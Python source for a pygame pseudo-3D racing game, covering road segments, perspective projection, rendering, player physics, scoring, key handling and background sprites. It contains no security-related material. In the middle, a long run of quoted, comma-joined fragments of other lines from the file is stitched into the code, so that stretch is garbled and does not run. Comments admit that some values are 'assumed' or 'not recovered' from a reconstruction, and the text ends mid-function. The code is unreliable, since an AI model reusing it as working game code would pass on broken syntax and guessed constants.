    def add_road(self, enter, hold, leave, curve, yw=0.0):
        #print enter, hold, leave, curve, yw
        start_y = self.seg_lasy_y()
        end_y = start_y + (int(yw) * self.seg_len)
        total = enter + hold + leave
        for n in range(enter):
            self.rd_seg_add(self.util_ease_in(0, curve, float(n)/enter),
                            self.util_ease_out(start_y, end_y, float(n)/total))
        for n in range(hold):
            self.rd_seg_add(curve,
                            self.util_ease_out(start_y, end_y, (float(n)+enter)/total))
        for n in range(leave):
            self.rd_seg_add(self.util_ease_out(curve, 0, float(n)/leave),
                            self.util_ease_out(start_y, end_y, (float(n)+enter+hold)/total))

    def add_curves(self):
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], -FP_ROAD['CURVE']['MEDIUM'])
        self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'],
                      FP_ROAD['LENGTH']['MEDIUM'], 0.0)

    def add_low_rolling_hills(self, num, height):
        num = num or FP_ROAD['LENGTH']['SHORT']
        height = height or FP_ROAD['HILL']['LOW']
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, -height)
        self.add_road(num, num, num, 0, height)
        self.add_road(num, num, num, 0, 0)
        self.add_road(num, num, num, 0, height/2.0)
        self.add_road(num, num, num, 0, 0)

    def rd_start_seg_init(self, n=3):
        seg_n = len(self.segments)
        if seg_n == 0:
            return
        #self.segments[0]['color'] = FP_COLORS['START_Y']
        #self.segments[2]['color'] = FP_COLORS['START_Y']
        for i in range(n):
            self.segments[i]['color'] = FP_COLORS['START_Y']

    def rd_sprts_init_rand(self, n=None):
        seg_n = len(self.segments)
        if n is None:
            #n = seg_n / 20
            n = seg_n / random.randint(10, 30)
        for i in range(n):
            j = random.randint(10, seg_n - 10)
            sprt = random.choice(FP_ROAD_SPRTS.keys())
            s = {
                'name': sprt,
                'type': 1,  # image / animate / ...
                'obj': None,  # need to create at render time
                # get real (random) x from x_pos
                'x_i': random.randint(0, 4),
                'score': FP_ROAD_SPRTS[sprt].get('score', 0),
            }
            self.segments[j]['sprites'].append(s)

    def rd_sprts_del_all_objs(self):
        for k, sprt in self.rd_sprt_objs.items():
            #print k, sprt
            self.disp_del(sprt)
            del self.rd_sprt_objs[k]

    def rd_seg_json_save(self, f):
        sc = self.rd_seg_get_cleared()
        s = utils.json_dumps(sc)
        with open(f, 'w') as fo:
            fo.write(s)

    def rd_seg_json_load(self, f):
        with open(f, 'r') as fi:
            s = fi.read()
        segs = utils.json_loads(s)
        return segs

    def rd_seg_get_cleared(self, segs=None):
        if not segs:
            segs = self.segments
        segs_c = []
        for seg in segs:
            if not seg['sprites']:
                segs_c.append(seg)
            else:
                seg_c = {}
                for k, v in seg.items():
                    if k not in ['sprites']:
                        seg_c[k] = v
                    else:
                        seg_c[k] = []
                        for spr in seg['sprites']:
                            spr_n = {}
                            for sk, sv in spr.items():
                                if sk not in ['obj']:
                                    spr_n[sk] = sv
                                else:
                                    spr_n[sk] = None
                            seg_c[k].append(spr_n)
                segs_c.append(seg_c)
        return segs_c

    # #### utils ####
    def util_limit(self, value, mn, mx):
        return max(mn, min(value, mx))

    def util_accelerate(self, v, accel, dt):
        return v + (accel * dt)

    def util_increase(self, start, increment, mx):
        # with looping
        result = start + increment
        while (result >= mx):
            result -= mx
        while (result < 0):
            result += mx
        return result

    def util_ease_in(self, a, b, percent):
        return a + (b - a) * math.pow(percent, 2)

    def util_ease_out(self, a, b, percent):
        return a + (b - a) * (1 - math.pow(1 - percent, 2))

    def util_ease_in_out(self, a, b, percent):
        return a + (b - a) * ((-math.cos(percent * math.pi)/2) + 0.5)

    def util_curve_percent_remaining(self, n, total):
        return (n % total) / total

    # #### geometry ####
    def geo_prjc_scale(self, d, zc):
        if zc == 0.0:
            return d
        return d / zc

    def xc_to_xp(self, xc, d, zc):
        if zc == 0.0:
            xp = xc
        else:
            xp = xc * (d / zc)
        return xp

    def xp_to_xs(self, xp, w):
        #xs = w / 2.0 + w / 2.0 * xp
        xs = w / 2.0 + xp
        return xs

    def yc_to_yp(self, yc, d, zc):
        if zc == 0.0:
            #yp = float('inf')
            #yp = 2 ** 64
            yp = yc
        else:
            yp = yc * (d / zc)
        return yp

    def yp_to_ys(self, yp, h):
        #ys = h / 2.0 - h / 2.0 * yp
        ys = h / 2.0 - yp
        return ys

    def get_seg_base_i(self, pos=None):
        if pos is None:
            pos = self.position
        i = int(pos / self.seg_len)
        #x#i = int(utils.math_round(pos / self.seg_len))
        #i = int(math.floor(pos / self.seg_len))
        #i = int(math.ceil(pos / self.seg_len))
        seg_n = len(self.segments)
        i = (i) % seg_n
        return i

    def rd_get_segs(self, whole=False):
        if whole:
            segs = self.segments
        else:
            segs = self.segments[:-self.seg_draw_n]
        return segs

    # #### render ####
    def rd_seg_render__1_o(self):
        """straight"""
        xc1 = self.road_w / 2 - self.player_x
        xc2 = -self.road_w / 2 - self.player_x
        xc3 = self.road_w / 2 - self.player_x
        xc4 = -self.road_w / 2 - self.player_x
        yc = self.camera_h
        for i, seg in enumerate(self.segments):
            zw1 = seg['p1']['world']['z']
            zw2 = seg['p2']['world']['z']
            zc1 = zw1 - self.camera_z - self.position
            zc2 = zw2 - self.camera_z - self.position
            #zc1 = self.position - (zw1 - self.camera_z)
            #zc2 = self.position - (zw2 - self.camera_z)
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])

    def rd_seg_render(self):
        #print 'self.position', self.position
        # <2>
        seg_n = len(self.segments)
        segbi = self.get_seg_base_i()
        #print 'segbi', segbi, ' / ', seg_n
        self.player_seg = self.segments[segbi]
        self.base_seg = self.segments[(segbi + 2) % seg_n]
        # for test
        #self.base_seg['color'] = FP_COLORS['FINISH']
        b_curve = self.player_seg.get('curve', 0.0)
        #b_percent = 0.5
        b_percent = self.util_curve_percent_remaining(self.position, self.seg_len)
        dx_curve = - (b_curve * b_percent)
        x_curve = 0
        #print 'b_curve', b_curve
        #print 'world z', self.player_seg['p1']['world']['z']
        #print 'world y', self.player_seg['p1']['world'].get('y', 0.0)
        # clear the sprites cache
        self.rd_sprt_cache = []
        yc = self.camera_h
        # <1>
        #for i, seg in enumerate(self.segments):
        # <2>
        for i in range(self.seg_draw_n):
            si = (segbi + i) % seg_n
            #print si
            seg = self.segments[si]
            '''
            # for test
            if i < 10:
                print '>>> ', i
                print 'curve', seg.get('curve', 0.0)
                print 'world z', seg['p1']['world']['z']
                print 'world y', seg['p1']['world'].get('y', 0.0)
                #print '-' * 30
            '''
            '''
            #x#
            if seg['index'] < segbi:
                zw1 = (i+1)*self.seg_len
                zw2 = (i+2)*self.seg_len
            else:
                # <1>
                zw1 = seg['p1']['world']['z']
                zw2 = seg['p2']['world']['z']
            '''
            zw1 = (i+1)*self.seg_len
            zw2 = (i+2)*self.seg_len
            zc1 = zw1 - self.camera_z - (self.position % self.seg_len)
            zc2 = zw2 - self.camera_z - (self.position % self.seg_len)
            # for hills
            yw1 = seg['p1']['world'].get('y', 0.0)
            yw2 = seg['p2']['world'].get('y', 0.0)
            yc1 = yc - yw1
            yc2 = yc - yw2
            xc1 = self.road_w / 2 - self.player_x
            xc2 = -self.road_w / 2 - self.player_x
            xc3 = self.road_w / 2 - self.player_x
            xc4 = -self.road_w / 2 - self.player_x
            xcl1 = xc1 - self.lane_w
            xcl2 = xc2 + self.lane_w
            xcl3 = xc3 - self.lane_w
            xcl4 = xc4 + self.lane_w
            xcr1 = self.lane_w - self.player_x
            xcr2 = -self.lane_w - self.player_x
            xcr3 = self.lane_w - self.player_x
            xcr4 = -self.lane_w - self.player_x
            # for curve
            xc1 = xc1 - x_curve
            xc2 = xc2 - x_curve
            xc3 = xc3 - x_curve - dx_curve
            xc4 = xc4 - x_curve - dx_curve
            xcl1 = xcl1 - x_curve
            xcl2 = xcl2 - x_curve
            xcl3 = xcl3 - x_curve - dx_curve
            xcl4 = xcl4 - x_curve - dx_curve
            xcr1 = xcr1 - x_curve
            xcr2 = xcr2 - x_curve
            xcr3 = xcr3 - x_curve - dx_curve
            xcr4 = xcr4 - x_curve - dx_curve
            x_curve = x_curve + dx_curve
            dx_curve = dx_curve + seg.get('curve', 0.0)
            xp1 = self.xc_to_xp(xc1, self.d, zc1)
            xs1 = self.xp_to_xs(xp1, self.w)
            xp2 = self.xc_to_xp(xc2, self.d, zc1)
            xs2 = self.xp_to_xs(xp2, self.w)
            xp3 = self.xc_to_xp(xc3, self.d, zc2)
            xs3 = self.xp_to_xs(xp3, self.w)
            xp4 = self.xc_to_xp(xc4, self.d, zc2)
            xs4 = self.xp_to_xs(xp4, self.w)
            yp1 = self.yc_to_yp(yc1, self.d, zc1)
            ys1 = self.yp_to_ys(yp1, self.h)
            ys2 = ys1
            yp3 = self.yc_to_yp(yc2, self.d, zc2)
            ys3 = self.yp_to_ys(yp3, self.h)
            ys4 = ys3
            # grass
            self.render_polygon(None, 0, ys1, self.w, ys2, self.w, ys4, 0, ys3,
                                seg['color']['grass'])
            # road
            self.render_polygon(None, xs1, ys1, xs2, ys2, xs4, ys4, xs3, ys3,
                                seg['color']['road'])
            if 1:#i % 2 == 1:
                # rumble strips and the center lane line
                xpl1 = self.xc_to_xp(xcl1, self.d, zc1)
                xsl1 = self.xp_to_xs(xpl1, self.w)
                xpl2 = self.xc_to_xp(xcl2, self.d, zc1)
                xsl2 = self.xp_to_xs(xpl2, self.w)
                xpl3 = self.xc_to_xp(xcl3, self.d, zc2)
                xsl3 = self.xp_to_xs(xpl3, self.w)
                xpl4 = self.xc_to_xp(xcl4, self.d, zc2)
                xsl4 = self.xp_to_xs(xpl4, self.w)
                self.render_polygon(None, xs1, ys1, xsl1, ys1, xsl3, ys3, xs3, ys3,
                                    seg['color']['rumble'])
                self.render_polygon(None, xs2, ys2, xsl2, ys2, xsl4, ys4, xs4, ys4,
                                    seg['color']['rumble'])
                xpr1 = self.xc_to_xp(xcr1, self.d, zc1)
                xsr1 = self.xp_to_xs(xpr1, self.w)
                xpr2 = self.xc_to_xp(xcr2, self.d, zc1)
                xsr2 = self.xp_to_xs(xpr2, self.w)
                xpr3 = self.xc_to_xp(xcr3, self.d, zc2)
                xsr3 = self.xp_to_xs(xpr3, self.w)
                xpr4 = self.xc_to_xp(xcr4, self.d, zc2)
                xsr4 = self.xp_to_xs(xpr4, self.w)
                self.render_polygon(None, xsr1, ys1, xsr2, ys2, xsr4, ys4, xsr3, ys3,
                                    seg['color']['rumble'])
            # render road sprites
            # TODO: check if this seg is looped
            seg_scale = self.geo_prjc_scale(self.d, zc1)
            #x_sprt = (xs1 + xs2) / 2.0
            #y_sprt = (ys1 + ys3) / 2.0
            x_pos = [xsr1, xsr2, (xsr1 + xsl1) / 2.0, (xsr2 + xsl2) / 2.0, xsl1, xsl2]
            #x_sprt = xsr1
            x_sprt = (xsr1 + xsl1) / 2.0
            x_i = random.randint(0, len(x_pos) - 1)  # NOTE: not used now !!
            ##x_i = 2
            y_sprt = ys1
            scale_sprt = seg_scale * 8.0#10.0#2.0
            obj = self.rd_sprts_render(seg, x_pos, x_i, y_sprt, scale_sprt)
            if obj:
                self.rd_sprt_cache.append(obj)
        # render the sprites with right order
        for obj in self.rd_sprt_cache[::-1]:
            self.disp_add(obj)

    def render_polygon(self, ctx, x1, y1, x2, y2, x3, y3, x4, y4, color):
        #d = 200#100#240#50#
        #a = 60
        #pnts = [[x1, y1], [x2, y2], [x3, y3], [x4, y4], [x1, y1]]
        #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]
        # flip the y-
        d = 116
        pnts = [[x1, d-y1], [x2, d-y2], [x3, d-y3], [x4, d-y4], [x1, d-y1]]
        c = utils.clr_from_str(color)
        try:
            self.pygm.draw.polygon(self.surf, c, pnts)
        except Exception as e:
            #print '-' * 60
            pass

    def rd_sprts_render(self, seg, x_pos, x_i, y, scale):
        sprts = seg.get('sprites')
        if not sprts:
            return None
        obj = None
        for i, info in enumerate(sprts):
            sprt = info['name']
            obj_k = str(seg['index']) + '_' + str(i) + '_' + sprt
            obj = info.get('obj')
            '''
            # TODO: <1>
            if not obj:
                img = FP_ROAD_SPRTS[sprt]['imgs'][0]
                obj = FPSptRdSprts.create_by_img(img)
                info['obj'] = obj
                self.disp_add(obj)
            '''
            # <2>
            if obj:
                self.disp_del(obj)
                # NOTE: objs will be deleted at rd_sprts_del_all_objs()
                ##del self.rd_sprt_objs[obj_k]
            img = FP_ROAD_SPRTS[sprt]['imgs'][0]
            obj = FPSptRdSprts.create_by_img(img)
            # Width or height is too large
            if scale > 500:
                #print 'scale <1>', scale
                pass
            x_i_saved = info.get('x_i')
            #if not x_i_saved:
            #    info['x_i'] = x_i
            x_i = x_i_saved
            obj.rect.top = 116 - y + 240 - obj.rect.height
            obj.rect.left = x_pos[x_i] - obj.rect.width / 2
            #obj.scale(scale)
            info['obj'] = obj
            ##self.disp_add(obj)  # NOTE: render out here
            self.rd_sprt_objs[obj_k] = obj  # for reset to delete all
            # NOTE: only show one
            break
        return obj

    # #### update ####
    def update_world(self):
        if self.player_go == 1:
            self.speed += self.speed_dt_up
        elif self.player_go == 2:
            self.speed -= self.speed_dt_dn
        else:
            self.speed -= self.speed_dt_na
        # if on the grass, slow down
        if self.player_x < -self.road_w / 2 or \
           self.player_x > self.road_w / 2:
            self.speed -= 10
        if self.speed < 0.0:
            self.speed = 0.0
        elif self.speed > self.speed_max:
            self.speed = self.speed_max
        self.position += self.speed
        if self.position > self.track_len:
            self.position -= self.track_len
            # a full lap; for check score
            self.last_seg_i = 0
            self.game_over = True
            self.game_score = 1.0
        if self.player_di == 1:
            #self.player_x += self.player_x_dt
            self.player_x += self.speed / 5 + 20
        elif self.player_di == 3:
            #self.player_x -= self.player_x_dt
            self.player_x -= self.speed / 5 + 20
        if self.speed <= 0.0:
            return
        p_curve = self.player_seg.get('curve', 0.0)
        #p_curve = 3
        #print 'p_curve', p_curve
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = 40
        #p_dt = -40
        #p_dt = random.randint(-100, 100)
        #print p_dt
        #self.player_x -= p_dt
        self.player_x += p_dt

    def check_player_di(self, e_keys_dn, e_keys_up):
        if 0 in e_keys_dn:
            self.player_go = 1
        elif 2 in e_keys_dn:
            self.player_go = 2
        if 1 in e_keys_dn:
            self.player_di = 1
        elif 3 in e_keys_dn:
            self.player_di = 3
        if 0 in e_keys_up:
            if self.player_go != 2:
                self.player_go = 0
        if 2 in e_keys_up:
            if self.player_go != 1:
                self.player_go = 0
        if 1 in e_keys_up:
            if self.player_di != 3:
                self.player_di = 0
        if 3 in e_keys_up:
            if self.player_di != 1:
                self.player_di = 0

    def check_if_car_out_road(self):
        # decrease score when go out the road
        if self.player_x < -self.road_w / 2 or \
           self.player_x > self.road_w / 2:
            if self.score > 0:
                self.score -= 1
            #self.score -= 2
            # for check score
            self.last_seg_i = 0
            self.game_over = True
            self.game_score = -1.0

    def check_score(self):
        # make sure we check score only once for a segment
        seg_i = self.player_seg['index']
        if seg_i > self.last_seg_i:
            self.last_seg_i = seg_i
        else:
            return
        # NOTE: here we should use the segment just under the car
        #sprts = self.player_seg['sprites']
        sprts = self.base_seg['sprites']
        if not sprts:
            return
        # NOTE: we now only use the first sprite !
        sprt = sprts[0]
        x_i = sprt.get('x_i')
        obj = sprt.get('obj')
        if not obj:
            # None or 0
            return
        scr = sprt.get('score')
        if not scr:
            # None or 0
            return
        #rd_w_half = self.road_w / 2
        #x_at = [..., -rd_w_half + self.lane_w, ..., rd_w_half - self.lane_w]
        sprt_x = obj.rect.left
        sprt_w = obj.rect.width
        car_x = self.player_x
        car_w = self.car.rect.width
        sprt_at = 10000
        if x_i == 0:
            sprt_at = 40
        elif x_i == 1:
            sprt_at = -40
        elif x_i == 2:
            sprt_at = 580
        elif x_i == 3:
            sprt_at = -580
        elif x_i == 4:
            sprt_at = 1100
        elif x_i == 5:
            sprt_at = -1100
        #print 'sprt_x', sprt_x
        #print 'car_x', car_x
        #print 'car_w', car_w
        #print 'sprt_at', (car_x - car_w / 2), sprt_at, (car_x + car_w / 2)
        #print '-' * 40
        w_half = car_w / 2 + sprt_w / 2
        #if (car_x - car_w / 2) < sprt_x < (car_x + car_w / 2):
        if (car_x - w_half) < sprt_at < (car_x + w_half):
            self.score += scr

    def check_tm(self):
        if self.position > self.seg_len * 2:
            if self.tm_start == 0.0:
                self.tm_start = time.time()
                self.tm_end = self.tm_start
            else:
                self.tm_end = time.time()
                self.tm_last_once = self.tm_end - self.tm_start
        else:
            self.tm_start = 0.0
            #self.tm_end = 0.0

    def update_bg(self):
        # always move the cloud
        for sky in self.bg_sky:
            sky.rect.left -= 1#self.sky_speed
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
            if sky.rect.left - sky.rect.width > 0:
                sky.rect.left -= sky.rect.width * 2
        if self.speed <= 0.0:
            return
        p_curve = self.player_seg.get('curve', 0.0)
        #print 'p_curve', p_curve
        p_dt = self.speed * p_curve * self.centrifugal
        #p_dt = 40
        #p_dt = -40
        #p_dt = random.randint(-100, 100)
        #print p_dt
        for sky in self.bg_sky:
            #sky.rect.left -= self.sky_speed
            sky.rect.left += int(self.sky_speed * p_dt)
            if sky.rect.left + sky.rect.width < 0:
                sky.rect.left += sky.rect.width * 2
            if sky.rect.left - sky.rect.width > 0:
                sky.rect.left -= sky.rect.width * 2
        for hill in self.bg_hills:
            hill.rect.left += int(self.hill_speed * p_dt)
            if hill.rect.left + hill.rect.width < 0:
                hill.rect.left += hill.rect.width * 2
            if hill.rect.left - hill.rect.width > 0:
                hill.rect.left -= hill.rect.width * 2
        for trees in self.bg_trees:
            trees.rect.left += int(self.tree_speed * p_dt)
            if trees.rect.left + trees.rect.width < 0:
                trees.rect.left += trees.rect.width * 2
            if trees.rect.left - trees.rect.width > 0:
                trees.rect.left -= trees.rect.width * 2

    # #### events ####
    def handle_event(self, events, *args, **kwargs):
        #print '>>> ', events
        if not self.flag_check_event:
            return events
        else:
            return self.check_key(events)

    def key_to_di(self, k):
        if k == self.pglc.K_UP:
            return 0
        elif k == self.pglc.K_RIGHT:
            return 1
        elif k == self.pglc.K_DOWN:
            return 2
        elif k == self.pglc.K_LEFT:
            return 3
        else:
            return None

    def key_to_di_b(self, k):
        if k == self.pglc.K_f or k == self.pglc.K_j:
            return 0
        elif k == self.pglc.K_k:
            return 1
        elif k == self.pglc.K_v or k == self.pglc.K_n:
            return 2
        elif k == self.pglc.K_d:
            return 3
        else:
            return None

    def check_key(self, events):
        #print id(events)
        r_events = []
        e_keys_up = []
        e_keys_dn = []
        for event in events:
            #print event
            if event.type == self.pglc.KEYUP:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_up.append(di)
                else:
                    r_events.append(event)
            elif event.type == self.pglc.KEYDOWN:
                di = self.key_to_di(event.key)
                if di is None:
                    di = self.key_to_di_b(event.key)
                if di is not None:
                    e_keys_dn.append(di)
                else:
                    r_events.append(event)
            else:
                r_events.append(event)
        self.e_keys_up = e_keys_up
        self.e_keys_dn = e_keys_dn
        return r_events

    def refresh__1(self, fps_clock, *args, **kwargs):
        #print '>>> refresh'
        #'''
        if self.player_di == 3:
            # <
            self.player_x -= 9
            if self.player_x < -1000:
                self.player_di = 1
        elif self.player_di == 1:
            self.player_x += 19
            if self.player_x > 1000:
                self.player_di = 3
        #'''
        #'''
        self.position += random.randint(2, 10)
        if self.position > self.track_len:
            self.position -= self.track_len
        #'''
        self.draw_on()
        self.rd_seg_render()

    def refresh(self, fps_clock, *args, **kwargs):
        self.check_player_di(self.e_keys_dn, self.e_keys_up)
        self.draw_on()
        self.rd_seg_render()
        self.update_world()
        self.check_if_car_out_road()
        self.check_score()
        self.check_tm()
        self.update_bg()
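
# --- worked numbers for the projection and drift above; sketches, not part
# of the game.  The active pipeline is xc_to_xp -> xp_to_xs (x) and
# yc_to_yp -> yp_to_ys (y): a plain perspective divide by camera depth zc:
def _demo_project(xc, yc, zc, d=200.0, w=640, h=240):
    scale = d / zc  # geo_prjc_scale
    return w / 2.0 + xc * scale, h / 2.0 - yc * scale

#print _demo_project(1200.0, 500.0, 400.0)   # (920.0, -130.0)
#print _demo_project(1200.0, 500.0, 3200.0)  # (395.0, 88.75) -> vanishing

# update_world couples lateral drift to speed and segment curve; with the
# centrifugal default of 0.3 assumed in the reconstruction above:
def _demo_drift(speed, curve, centrifugal=0.3):
    return speed * curve * centrifugal  # p_dt

#print _demo_drift(300.0, 4)   # 360.0 at top speed in a MEDIUM curve
#print _demo_drift(300.0, -4)  # -360.0, pushed the other way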
class FPSptRoadMap(sptdraw.SptDrawBase):
    def __init__(self, size, segs, rad, *args, **kwargs):
        super(FPSptRoadMap, self).__init__(size)
        self.segs = segs
        self.rad = rad
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.draw_segs(self.segs, self.rad)

    def xy_to_cntr(self, x, y):
        return [self.size[0] / 2 + x, self.size[1] / 2 - y]

    def cv_to_engl(self, curve, rad):
        a = float(curve) / rad
        a *= 10.0
        #print a
        if a < -1.0:
            a = -1.0
        elif a > 1.0:
            a = 1.0
        #tht_d = math.acos(a)
        tht_d = math.asin(a)
        return tht_d

    def get_segs_pnts(self, segs, rad):
        pnts = []
        x, y = 0.0, 0.0
        tht = 0.0
        rad_m = 4.0#2.0#1.0#
        cv_s = 0
        cv_l = 0.0
        pnts.append([x, y])
        for seg in segs:
            curve = seg.get('curve', 0.0)
            if curve == 0.0:
                if cv_s:
                    # a curve run just ended: turn it into a heading change
                    tht_d = self.cv_to_engl(cv_l, rad)
                    #tht += tht_d
                    tht -= tht_d
                    rad_m = 20.0#10.0#50.0#
                    cv_s = 0
                    cv_l = 0.0
                else:
                    rad_m = 0.5#1.0#0.1#
            else:
                # accumulate the curve, draw nothing yet
                if cv_s:
                    cv_l += curve
                else:
                    cv_s = 1
                    cv_l = curve
                continue
            x += rad_m * math.cos(tht)
            y += rad_m * math.sin(tht)
            pnts.append([x, y])
        #print pnts
        return pnts

    def draw_segs(self, segs, rad):
        pnts = self.get_segs_pnts(segs, rad)
        #print pnts
        if len(pnts) <= 1:
            return
        #if len(pnts) > 0:
        #    pnts.append(pnts[0])
        cpnts = [self.xy_to_cntr(p[0], p[1]) for p in pnts]
        c = utils.clr_from_str(FP_COLOR_BLUE)
        #self.pygm.draw.polygon(self.surf, c, cpnts)
        self.pygm.draw.lines(self.surf, c, False, cpnts, 3)
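
# --- worked numbers for FPSptRoadMap.cv_to_engl above: the accumulated
# curve is scaled by 10/rad (rad is seg_len, 200.0 here), clamped into
# [-1, 1], then turned into a heading change via asin; a sketch:
def _demo_cv_to_engl(curve, rad=200.0):
    a = max(-1.0, min(1.0, float(curve) / rad * 10.0))
    return math.asin(a)

#print _demo_cv_to_engl(4.0)   # asin(0.2)  ~ 0.201 rad
#print _demo_cv_to_engl(80.0)  # clamped: asin(1.0) ~ 1.571 rad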
* 30", "y2, x3, y3, x4, y4, color): #d = 200#100#240#50# #a", "4.0#2.0#1.0# pnts.append([x, y]) for seg in segs: curve = seg.get('curve',", "return None for i, info in enumerate(sprts): sprt = info['name']", "self.size[1] - y, self.size[0] - 2, y]) class FPStraight(pygm.PyGMSprite): def", "2: if self.score > 0: self.score -= 1 #self.score -=", "* UP/DOWN/LEFT/RIGHT * SPACE : hide/show road map * TAB", "self.bg_hills2.rect.top = 0 self.bg_hills2.rect.left = self.bg_hills1.rect.width self.disp_add(self.bg_hills2) self.bg_trees1 = FPSptBg('img_flatpath/images/background.png',", "#print enter, hold, leave, curve, yw start_y = self.seg_lasy_y() end_y", "xcr3 = self.lane_w - self.player_x xcr4 = -self.lane_w - self.player_x", "*args, **kwargs): super(FPSptRdSprts, self).__init__(img_file) @classmethod def create_by_img(cls, img): return cls(img)", "'#696969', 'grass': '#009A00', 'rumble': '#BBBBBB' }, 'START': {'road': FP_COLOR_WHITE, 'grass':", "-FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['MEDIUM']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['LENGTH']['MEDIUM'], FP_ROAD['CURVE']['EASY']) self.add_road(FP_ROAD['LENGTH']['MEDIUM'],", "# always move the cloud for sky in self.bg_sky: sky.rect.left", "SPACE : hide/show road map * TAB : replay this", "2 ##self.disp_add(self.car) # car disp add after road #self.road =", "'-' * 40 w_half = car_w / 2 + sprt_w", "None: e_keys_dn.append(di) else: r_events.append(event) else: r_events.append(event) self.e_keys_up = e_keys_up self.e_keys_dn", "0.0) # clear the sprites cache self.rd_sprt_cache = [] #", "c=consts.YELLOW, font_size=16) self.tm_once.rect.top = 20#454 self.tm_once.rect.left = 600 self.disp_add(self.tm_once) self.prog", "+ w / 2.0 * xp xs = w /", "FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg = { 'index': n,", "#p_curve = 3 #print 'p_curve', p_curve p_dt = self.speed *", "625, 'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1': {", "[[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4, y4-d], [x1, y1-d]]", "# for hills yw1 = seg['p1']['world'].get('y', 0.0) yw2 = seg['p2']['world'].get('y',", "= 0 if 3 in e_keys_up: if self.player_di != 1:", "y1]] #pnts = [[x1, y1-d], [x2, y2-d], [x3, y3-d], [x4,", "{ 'x': 150, 'y': 555, 'w': 328, 'h': 282 },", "self.player_seg.get('curve', 0.0) #p_curve = 3 #print 'p_curve', p_curve p_dt =", "'x': 625, 'y': 5, 'w': 360, 'h': 360 }, 'DEAD_TREE1':", "Width or height is too large if scale > 500:", "check_if_car_out_road(self): # decrease score when go out the road if", "= sprt.get('score') if not scr: # None or 0 return", "= FP_COLORS['DARK'] #c = {'road': FP_COLOR_BLACK} seg = { 'index':", "len(x_pos) - 1) # NOTE: not used now !! 

class SptTmpi(pygm.SptImg):
    """Temporary image sprite used for tests."""
    def __init__(self, img_file, *args, **kwargs):
        super(SptTmpi, self).__init__(img_file)


class SptTmpx(sptdraw.SptDrawBase):
    """Temporary drawn sprite used for tests: green square with a white dot."""
    def __init__(self, size, *args, **kwargs):
        super(SptTmpx, self).__init__(size)
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        self.fill(consts.GREEN)
        # white dot in the middle (radius assumed; not recovered)
        self.pygm.draw.circle(self.surf, consts.WHITE,
                              (self.size[0] // 2, self.size[1] // 2), 10, 0)


class FPSptBg(pygm.SptImgOne):
    """One tile of a scrolling background strip from background.png."""
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptBg, self).__init__(img_file, pos)


class FPSptSprts(pygm.SptImgOne):
    """A single sprite cut from sprites.png (e.g. the player car)."""
    def __init__(self, img_file, pos, *args, **kwargs):
        super(FPSptSprts, self).__init__(img_file, pos)


class FPSptRdSprts(pygm.SptImgOne):
    """A roadside sprite (coins, rocks, ...) built from a single image."""
    def __init__(self, img_file, *args, **kwargs):
        super(FPSptRdSprts, self).__init__(img_file)

    @classmethod
    def create_by_img(cls, img):
        return cls(img)
        # for test
        #o = SptTmpx((40, 40))
        #return o


class FPSptFog(sptdraw.SptDrawBase):
    """Horizontal fog band: thin strips whose alpha fades out downward."""
    def __init__(self, size, c=[0, 81, 8, 0], h=30, *args, **kwargs):
        super(FPSptFog, self).__init__(size)
        self.c = c
        self.h = h
        self.draw_on()

    def draw_on(self, *args, **kwargs):
        #self.fill(self.c)
        d = 2
        n = self.h // d
        for i in range(n):
            rct = [0, i * d, self.size[0], d]
            #ca = 255 / n * (n - i)
            ca = 200 // n * (n - i)
            c = [self.c[0], self.c[1], self.c[2], ca]  # (alpha fill assumed)
            self.surf.fill(c, rct)
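
# Illustrative sketch, not part of the original module: the fog band above is
# a stack of 2px strips whose alpha falls off linearly, ca = 200 / n * (n - i)
# for strip i of n. Printing the ramp makes the fade easy to inspect without
# pygame:
def _demo_fog_alpha_ramp(h=30, d=2):
    n = h // d
    for i in range(n):
        ca = 200 // n * (n - i)
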